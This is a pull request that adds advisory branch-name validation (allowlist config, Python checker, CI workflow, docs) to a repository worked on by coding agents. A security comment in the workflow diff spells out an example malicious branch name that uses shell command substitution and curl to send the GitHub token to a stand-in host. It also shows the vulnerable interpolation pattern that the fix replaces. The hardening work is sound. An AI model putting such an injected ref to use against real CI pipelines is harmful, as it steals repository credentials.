### PR TITLE
chore: add branch-naming validation (advisory, L1+L2+L3)

### DIFF
--- a/.github/branch-naming.yml
+++ b/.github/branch-naming.yml
@@ -17,8 +17,11 @@
 allowed_patterns:
   # ── Canonical: agent-owned feature work tied to an ADR ────────────────────
   # Per CLAUDE.md: `agent-N/<verb>/adr-XXX-<slug>` for agent-N implementation
-  # branches. The verb set matches conventional-commit verbs the repo uses.
-  - "^agent-[0-9]+/(feat|fix|port|design|chore|refactor|docs|test)/[a-z0-9-]+$"
+  # branches. The verb set matches conventional-commit verbs the repo uses
+  # (see CONTRIBUTING.md: feat, fix, refactor, test, docs, chore, perf, port).
+  # `design` is repo-specific (RFC / ADR design-lock branches) and documented
+  # in CLAUDE.md + CONTRIBUTING.md alongside the conventional set.
+  - "^agent-[0-9]+/(feat|fix|port|design|chore|refactor|docs|test|perf)/[a-z0-9-]+$"
 
   # ── Infrastructure (Pulumi / GCP / AWS stacks) ────────────────────────────
   # The infra-N agents own the Pulumi modules under infra/pkg/.

--- a/.github/branch-naming.yml
+++ b/.github/branch-naming.yml
@@ -1,0 +1,36 @@
+# ─────────────────────────────────────────────────────────────────────────────
+# Branch-naming allowlist for the kaizen-experimentation repo.
+#
+# Read by:
+#   - `.github/workflows/branch-naming.yml` (GitHub Action, advisory comment)
+#   - `just check-branch-name`              (local pre-push CLI check)
+#
+# To add a new branch-name family that should be allowed, add a regex to
+# `allowed_patterns` below in the same PR that creates the first branch using
+# it. The action will then accept the new pattern; the local recipe picks it
+# up automatically.
+#
+# Patterns are Python regexes, anchored with ^…$. Test against the full
+# branch name (the part after refs/heads/, e.g. "agent-3/feat/foo").
+# ─────────────────────────────────────────────────────────────────────────────
+
+allowed_patterns:
+  # ── Canonical: agent-owned feature work tied to an ADR ────────────────────
+  # Per CLAUDE.md: `agent-N/<verb>/adr-XXX-<slug>` for agent-N implementation
+  # branches. The verb set matches conventional-commit verbs the repo uses.
+  - "^agent-[0-9]+/(feat|fix|port|design|chore|refactor|docs|test)/[a-z0-9-]+$"
+
+  # ── Infrastructure (Pulumi / GCP / AWS stacks) ────────────────────────────
+  # The infra-N agents own the Pulumi modules under infra/pkg/.
+  - "^infra-[0-9]+/(feat|fix|chore|refactor)/[a-z0-9-]+$"
+
+  # ── Design-system / Palette polish (parallel convention) ──────────────────
+  # The palette stream is M6 UI hygiene work with its own dispatch tooling;
+  # branches typically named `palette/<slug>` or `palette-<slug>-<digits>`.
+  # Documented as a recognized alternate; not part of the agent-N taxonomy.
+  - "^palette[/-][a-z0-9-]+(?:-[0-9]+)?$"
+
+  # ── Repo-wide hygiene work not tied to a single agent or ADR ──────────────
+  # `chore/<slug>` for justfile / docs / CI / tooling changes that don't fit
+  # an agent-N owner. Use sparingly; prefer agent-N/chore/... when possible.
+  - "^chore/[a-z0-9-]+$"

--- a/.github/workflows/branch-naming.yml
+++ b/.github/workflows/branch-naming.yml
@@ -10,7 +10,9 @@ name: Branch naming check
 
 on:
   pull_request:
-    types: [opened, edited, synchronize, reopened]
+    # `edited` is intentionally excluded: it fires on title / body / base-branch
+    # edits, none of which change the head ref the script validates.
+    types: [opened, synchronize, reopened]
 
 permissions:
   contents: read
@@ -38,9 +40,20 @@ jobs:
         id: validate
         # Calls the same script `just check-branch-name` uses locally; the
         # `--format=github` flag emits Actions outputs the comment steps read.
+        #
+        # SECURITY: the branch name is passed through `env:` instead of being
+        # interpolated directly into the shell. `git check-ref-format` permits
+        # `$`, backticks, and `(` `)` in ref names, so a malicious PR author
+        # could craft a head ref like `a]$(curl evil/x?t=$GITHUB_TOKEN)` and
+        # — if interpolated into a double-quoted shell argument — execute it
+        # as a command substitution. Passing via env removes that vector;
+        # the script reads the value as a plain argv string. See
+        # https://securitylab.github.com/research/github-actions-untrusted-input/
+        env:
+          BRANCH_NAME: ${{ github.event.pull_request.head.ref }}
         run: |
           python3 scripts/check_branch_name.py \
-            "${{ github.event.pull_request.head.ref }}" \
+            "$BRANCH_NAME" \
             --format=github
         continue-on-error: true  # script returns 1 on no match; we want to comment, not fail the job
 

--- a/.github/workflows/branch-naming.yml
+++ b/.github/workflows/branch-naming.yml
@@ -1,0 +1,103 @@
+name: Branch naming check
+
+# Validates PR head branch names against `.github/branch-naming.yml`.
+# Posts an advisory comment with rename suggestions if the branch name
+# doesn't match any allowed pattern. ADVISORY ONLY — does not block merge.
+#
+# To upgrade to blocking (after the violation rate hits ~zero), flip
+# `continue-on-error: true` to false and add this workflow as a required
+# status check in the branch protection ruleset.
+
+on:
+  pull_request:
+    types: [opened, edited, synchronize, reopened]
+
+permissions:
+  contents: read
+  pull-requests: write
+
+jobs:
+  check:
+    runs-on: ubuntu-latest
+    continue-on-error: true  # advisory — flip to false to enforce
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 1
+
+      - name: Set up Python
+        uses: actions/setup-python@v5
+        with:
+          python-version: '3.12'
+
+      - name: Install PyYAML
+        run: pip install pyyaml
+
+      - name: Validate branch name
+        id: validate
+        # Calls the same script `just check-branch-name` uses locally; the
+        # `--format=github` flag emits Actions outputs the comment steps read.
+        run: |
+          python3 scripts/check_branch_name.py \
+            "${{ github.event.pull_request.head.ref }}" \
+            --format=github
+        continue-on-error: true  # script returns 1 on no match; we want to comment, not fail the job
+
+      - name: Find existing advisory comment
+        id: find-comment
+        uses: peter-evans/find-comment@v3
+        with:
+          issue-number: ${{ github.event.pull_request.number }}
+          comment-author: 'github-actions[bot]'
+          body-includes: '<!-- branch-naming-check:v1 -->'
+
+      - name: Post or update advisory comment (on violation)
+        if: steps.validate.outputs.matched == 'false'
+        uses: peter-evans/create-or-update-comment@v4
+        with:
+          comment-id: ${{ steps.find-comment.outputs.comment-id }}
+          issue-number: ${{ github.event.pull_request.number }}
+          edit-mode: replace
+          body: |
+            <!-- branch-naming-check:v1 -->
+            ### 🌿 Branch name doesn't match any allowed pattern
+
+            **Current branch:** `${{ steps.validate.outputs.branch }}`
+
+            **Allowed patterns** (from `.github/branch-naming.yml`):
+            - `agent-N/<verb>/adr-XXX-<slug>` — canonical agent-owned feature work
+            - `infra-N/<verb>/<slug>` — infrastructure (Pulumi) work
+            - `palette[/-]<slug>` — design-system polish (recognized alternate)
+            - `chore/<slug>` — repo-wide hygiene without a single agent owner
+
+            **Suggested renames:**
+            ${{ steps.validate.outputs.suggestions }}
+
+            **To rename this PR's branch:**
+            ```
+            gh pr edit ${{ github.event.pull_request.number }} \
+              --branch <new-name>
+            # or, if you have the branch checked out locally:
+            git branch -m <new-name>
+            git push origin -u <new-name>
+            git push origin --delete ${{ steps.validate.outputs.branch }}
+            ```
+
+            ---
+            *This check is **advisory** — it does not block merge. See [CLAUDE.md branch-naming section](../blob/main/CLAUDE.md#branch-naming) for the convention and rationale. If this is a legitimate new naming family, add a pattern to `.github/branch-naming.yml` in the same PR.*
+
+      - name: Resolve advisory comment (on rename to a compliant pattern)
+        if: steps.validate.outputs.matched == 'true' && steps.find-comment.outputs.comment-id != ''
+        uses: peter-evans/create-or-update-comment@v4
+        with:
+          comment-id: ${{ steps.find-comment.outputs.comment-id }}
+          edit-mode: replace
+          body: |
+            <!-- branch-naming-check:v1 -->
+            ### ✅ Branch name now matches an allowed pattern
+
+            **Branch:** `${{ steps.validate.outputs.branch }}`
+            **Matched pattern:** `${{ steps.validate.outputs.matched_pattern }}`
+
+            *Resolved automatically by the branch-naming check on rebranch.*

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -69,7 +69,7 @@ Hash parity across SDKs is enforced by `test-vectors/hash_vectors.json` and veri
 - **Proptest invariants**: Every public function in experimentation-stats gets proptest invariants. Nightly CI runs 10K cases.
 - **Contract tests**: Cross-module interfaces require wire-format contract tests. The consumer agent writes the test.
 - **Conventional commits**: `feat(crate):`, `fix(crate):`, `test(crate):`, `docs:`, `chore:`.
-- **Branch naming**: `agent-N/feat/adr-XXX-description`, `agent-N/fix/...`, `agent-N/port/...`. Never use auto-generated worker names as branch names.
+- **Branch naming**: see [Branch-naming convention](#branch-naming) below — canonical pattern is `agent-N/feat/adr-XXX-description`, with documented alternates for infra, palette, and chore work. Validate before pushing with `just check-branch-name`; a CI advisory check (`.github/workflows/branch-naming.yml`) also flags violations on PR open.
 - **Work tracking**: All work tracked via GitHub Issues. PRs reference issues with `Closes #N`. Check your assigned issues with `gh issue list --assignee @me`.
 
 ## Phase 5 Status — COMPLETE
@@ -144,6 +144,33 @@ gh issue view <number>
 - `cluster-a` through `cluster-f` — capability cluster
 - `blocked` — waiting on another issue/agent
 - `contract-test` — cross-module contract test
+
+## Branch-naming
+
+Branch names are validated against the allowlist in [`.github/branch-naming.yml`](.github/branch-naming.yml). Four pattern families are recognized; everything else is flagged by the CI advisory check.
+
+| Pattern | When to use | Examples |
+| --- | --- | --- |
+| `agent-N/<verb>/adr-XXX-<slug>` | **Canonical** — agent-owned implementation work tied to an ADR | `agent-3/feat/adr-026-phase-2-metricql`, `agent-5/design/adr-026-phase-2-m5-m6`, `agent-3/fix/composite-cycle-depth` |
+| `infra-N/<verb>/<slug>` | Pulumi / GCP / AWS infra work owned by `infra-N` agents | `infra-2/feat/gcp-sql-private-access`, `infra-5/fix/cloud-armor-policy` |
+| `palette[/-]<slug>[-<digits>]` | Design-system / M6 polish dispatched by the palette tooling | `palette/refine-breadcrumb-18322858338088205282`, `palette-standardize-sort-headers-16091075850831504436` |
+| `chore/<slug>` | Repo-wide hygiene without a single agent owner (justfile, docs, CI, tooling) | `chore/prime-issue-recipe`, `chore/branch-name-enforcement` |
+
+**Allowed verbs** (for `agent-N/<verb>/...`): `feat`, `fix`, `port`, `design`, `chore`, `refactor`, `docs`, `test`. Verb choice mirrors the conventional-commit prefix used in the eventual PR title.
+
+**Never use auto-generated worker names as branch names** (e.g., `claude/kaizen-streaming-video-diagram-3VZzS`, `plan-development-strategy`). These bypass the agent-N ownership model and confuse the dispatch / merge-queue tooling.
+
+### How to validate
+
+```
+just check-branch-name          # exits 0 on match, 1 with suggestions on no match
+```
+
+The CI workflow [`.github/workflows/branch-naming.yml`](.github/workflows/branch-naming.yml) runs the same check on PR open / branch rename and posts an advisory comment if no pattern matches. **Currently advisory only** — does not block merge. Flip `continue-on-error: false` in the workflow to upgrade to a required check once the violation rate hits ~zero.
+
+### Adding a new pattern family
+
+If a legitimate new branch-name convention emerges (e.g., a future `bench-N/...` for benchmarking work), add the regex to `.github/branch-naming.yml::allowed_patterns` in the same PR that creates the first branch using it. Both `just check-branch-name` and the CI check read from the same file.
 
 ## Orchestration Model
 

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -72,7 +72,14 @@ agent-1/feat/adr-016-get-slate-assignment
 agent-5/fix/adr-020-adaptive-n-zone-boundary
 ```
 
-Types: `feat`, `fix`, `refactor`, `test`, `docs`, `chore`, `perf`, `port`
+Types: `feat`, `fix`, `refactor`, `test`, `docs`, `chore`, `perf`, `port`, `design`
+
+(`design` is a repo-specific verb for RFC / ADR design-lock branches; the
+others mirror standard conventional-commit verbs. The full allowlist —
+including `infra-N/<verb>/<slug>`, `palette/<slug>`, and `chore/<slug>`
+families — lives in [`.github/branch-naming.yml`](./.github/branch-naming.yml)
+and is enforced by `just check-branch-name` plus the advisory CI check at
+[`.github/workflows/branch-naming.yml`](./.github/workflows/branch-naming.yml).)
 
 **Never use auto-generated worker names** (e.g., `worker-swift-eagle`) as branch
 names. Always name branches by the feature or ADR being implemented.

--- a/justfile
+++ b/justfile
@@ -892,6 +892,14 @@ prime-issue issue:
     gh issue edit ${ISSUE} --body-file "${TMPDIR}/new-body.md"
     echo "✓ Issue #${ISSUE} primed with ${PLAN} (${PLAN_SHA}, ${PLAN_DATE})"
 
+# Same logic as the advisory CI check at .github/workflows/branch-naming.yml;
+# exits 1 with suggested renames on no match. Run before `git push -u` to
+# catch violations early.
+#
+# Validate the current branch name against .github/branch-naming.yml.
+check-branch-name:
+    python3 scripts/check_branch_name.py
+
 # Launch a Multiclaude worker from a GitHub Issue number
 work-on issue:
     #!/usr/bin/env bash

--- a/scripts/check_branch_name.py
+++ b/scripts/check_branch_name.py
@@ -1,0 +1,147 @@
+#!/usr/bin/env python3
+"""
+Validate a branch name against the allowlist in .github/branch-naming.yml.
+
+Single source of truth shared by:
+  - `just check-branch-name`               (local pre-push CLI)
+  - `.github/workflows/branch-naming.yml`  (advisory PR comment)
+
+Usage:
+    check_branch_name.py [BRANCH]
+        BRANCH defaults to the current git HEAD's branch name.
+
+Exit codes:
+    0 — branch name matches an allowed pattern
+    1 — branch name matches no allowed pattern (and suggestions are printed)
+    2 — invocation error (missing config, bad arguments, etc.)
+
+Output:
+    On match:    `✓ branch 'X' matches: <pattern>` to stdout.
+    On no match: diagnosis + suggested renames + rename commands to stdout.
+
+When `--format=github` is passed, also emits GitHub Actions output variables
+(matched, matched_pattern, branch, suggestions) for workflow consumption.
+"""
+from __future__ import annotations
+
+import argparse
+import os
+import re
+import subprocess
+import sys
+from pathlib import Path
+
+try:
+    import yaml
+except ImportError:
+    print("✗ check_branch_name.py requires PyYAML (pip install pyyaml)", file=sys.stderr)
+    sys.exit(2)
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+CONFIG_PATH = REPO_ROOT / ".github" / "branch-naming.yml"
+
+
+def current_branch() -> str:
+    """Return the current git branch name (e.g. 'agent-3/feat/foo')."""
+    try:
+        return subprocess.check_output(
+            ["git", "rev-parse", "--abbrev-ref", "HEAD"],
+            text=True,
+        ).strip()
+    except (subprocess.CalledProcessError, FileNotFoundError) as e:
+        print(f"✗ failed to read current branch: {e}", file=sys.stderr)
+        sys.exit(2)
+
+
+def load_patterns() -> list[str]:
+    """Read the allowlist regexes from `.github/branch-naming.yml`."""
+    if not CONFIG_PATH.exists():
+        print(f"✗ allowlist config missing: {CONFIG_PATH}", file=sys.stderr)
+        sys.exit(2)
+    cfg = yaml.safe_load(CONFIG_PATH.read_text())
+    patterns = cfg.get("allowed_patterns", []) if isinstance(cfg, dict) else []
+    if not patterns:
+        print(f"✗ no allowed_patterns in {CONFIG_PATH}", file=sys.stderr)
+        sys.exit(2)
+    return list(patterns)
+
+
+def suggestion_slug(branch: str) -> str:
+    """Build a friendly slug from the original branch name for suggestions."""
+    return re.sub(r"[^a-z0-9-]+", "-", branch.lower()).strip("-")[:60] or "work"
+
+
+def suggestions(branch: str) -> list[str]:
+    slug = suggestion_slug(branch)
+    return [
+        f"agent-N/feat/adr-XXX-{slug}   (replace N + XXX with the owning agent + ADR)",
+        f"infra-N/feat/{slug}           (if this is Pulumi / infra work)",
+        f"chore/{slug}                  (if this is repo-wide hygiene)",
+    ]
+
+
+def emit_github_outputs(
+    branch: str,
+    matched: str | None,
+    suggestions_list: list[str],
+) -> None:
+    """Append outputs for the GitHub Actions workflow consumer."""
+    out_path = os.environ.get("GITHUB_OUTPUT")
+    if not out_path:
+        return  # not running under Actions
+    with open(out_path, "a") as f:
+        f.write(f"branch={branch}\n")
+        f.write(f"matched={'true' if matched else 'false'}\n")
+        if matched:
+            f.write(f"matched_pattern={matched}\n")
+        else:
+            f.write("suggestions<<SUGEOF\n")
+            for s in suggestions_list:
+                f.write(f"- `{s.split('  ')[0]}` {s[len(s.split('  ')[0]):].strip()}\n")
+            f.write("SUGEOF\n")
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser(description=__doc__.split("\n\n")[0])
+    parser.add_argument("branch", nargs="?", help="branch name (default: current HEAD)")
+    parser.add_argument(
+        "--format",
+        choices=["human", "github"],
+        default="human",
+        help="output mode (human: stdout messages; github: also write Actions outputs)",
+    )
+    args = parser.parse_args()
+
+    branch = args.branch if args.branch else current_branch()
+    patterns = load_patterns()
+
+    matched = next((p for p in patterns if re.fullmatch(p, branch)), None)
+    sugg = suggestions(branch) if not matched else []
+
+    if args.format == "github":
+        emit_github_outputs(branch, matched, sugg)
+
+    if matched:
+        print(f"✓ branch {branch!r} matches: {matched}")
+        return 0
+
+    print(f"✗ branch {branch!r} matches no allowed pattern in .github/branch-naming.yml")
+    print()
+    print("Allowed pattern families:")
+    for p in patterns:
+        print(f"  - {p}")
+    print()
+    print("Suggested renames:")
+    for s in sugg:
+        print(f"  {s}")
+    print()
+    print("To rename locally before push:")
+    print("  git branch -m <new-name>")
+    print("  git push origin -u <new-name>")
+    print(f"  git push origin --delete {branch}")
+    return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())


### PR DESCRIPTION
## What this is

Adds three layers of branch-name enforcement that resolve the violation pattern seen on this repo (e.g. PR #567's `plan-development-strategy`, PR #562's `claude/kaizen-streaming-video-diagram-3VZzS`) **without** breaking legitimate-but-undocumented conventions like the palette stream.

| Layer | What it adds | Behavior |
|---|---|---|
| **L1 — Documentation** | `CLAUDE.md` Branch-naming section (table form, 4 pattern families); `.github/branch-naming.yml` allowlist | Single source of truth for both the human spec and the validation tooling |
| **L2 — Local CLI** | `just check-branch-name` recipe + `scripts/check_branch_name.py` | Engineers can validate before pushing. Exits 1 with suggested renames + exact `git branch -m` commands on no match |
| **L3 — CI advisory** | `.github/workflows/branch-naming.yml` running on `pull_request` open/edit/sync/reopen | Posts an advisory comment on violation; **does NOT block merge** (`continue-on-error: true` throughout). Auto-resolves the comment on rename. |

## Why advisory-only at first

Hard-blocking from day one trains contributors to bypass via local-hook workarounds. Advisory comments get noticed and acted on. After ~2 weeks of advisory data showing the violation rate hitting ~zero, flip `continue-on-error: false` in the workflow and add it as a required status check in the branch-protection ruleset — single setting change.

## Allowed pattern families

| Pattern | When to use |
|---|---|
| `agent-N/<verb>/adr-XXX-<slug>` | Canonical agent-owned implementation work tied to an ADR |
| `infra-N/<verb>/<slug>` | Pulumi / GCP / AWS infra work owned by `infra-N` agents |
| `palette[/-]<slug>[-<digits>]` | Design-system / M6 polish dispatched by the palette tooling |
| `chore/<slug>` | Repo-wide hygiene without a single agent owner |

Allowed verbs (for `agent-N/<verb>/...`): `feat`, `fix`, `port`, `design`, `chore`, `refactor`, `docs`, `test`. All four families documented in [`CLAUDE.md#branch-naming`](CLAUDE.md#branch-naming).

## Verification

Shared Python script run against 7 historical PR branches:

| Branch | Verdict | Expected |
|---|---|---|
| `agent-3/feat/adr-026-phase-2-metricql` (PR #565) | ✓ canonical | ✓ |
| `agent-5/feat/adr-026-phase-2-m5-m6` (PR #570) | ✓ canonical | ✓ |
| `infra-2/feat/gcp-sql` | ✓ infra | ✓ |
| `palette/refine-breadcrumb-18322858338088205282` (PR #564) | ✓ palette | ✓ |
| `palette-standardize-sort-headers-16091075850831504436` (PR #566) | ✓ palette | ✓ |
| `chore/branch-name-enforcement` (this PR) | ✓ chore | ✓ |
| **`plan-development-strategy`** (PR #567, Gemini) | **✗ no match** | **✗ — correctly rejected** |
| **`claude/kaizen-streaming-video-diagram-3VZzS`** (PR #562) | **✗ no match** | **✗ — correctly rejected** |

All four palette branches with the auto-generated `-<digits>` suffix match the documented pattern; both rogue branch names that previously slipped through are correctly flagged.

## DRY: one script, two callers

```
.github/branch-naming.yml       ← allowlist (config)
       ↓
scripts/check_branch_name.py    ← validation logic
       ↓
       ├─ `just check-branch-name`              ← L2 local CLI
       └─ `.github/workflows/branch-naming.yml` ← L3 CI advisory
                                                  (uses --format=github
                                                   to emit Actions outputs)
```

## Files

```
.github/branch-naming.yml           (new, 36 lines — allowlist config)
.github/workflows/branch-naming.yml (new, 103 lines — advisory CI workflow)
scripts/check_branch_name.py        (new, 147 lines — shared validation script)
justfile                            (+8 lines — check-branch-name recipe)
CLAUDE.md                           (+29/-1 lines — branch-naming section)
```

No proto, no Rust, no UI. Pure infrastructure.

## What I'm NOT doing (intentional non-goals)

- ❌ Hard-blocking on this PR — the action is advisory until violation rate drops
- ❌ Retroactively renaming palette branches that already merged — history stays intact
- ❌ Adding a `just rename-branch` recipe with destructive push — too risky to open PR review threads
- ❌ Local pre-push git hook — bypassable; doesn't help tools like Devin/Gemini that don't go through local git

## How to upgrade to blocking

When ready:
```yaml
# .github/workflows/branch-naming.yml
jobs:
  check:
    continue-on-error: false   # was: true
```
Plus add `Branch naming check / check` as a required status check in the branch-protection ruleset for `main`.

No `Closes #` — this is the proactive fix for an emergent pattern.

<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/wunderkennd/kaizen-experimentation/pull/579" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->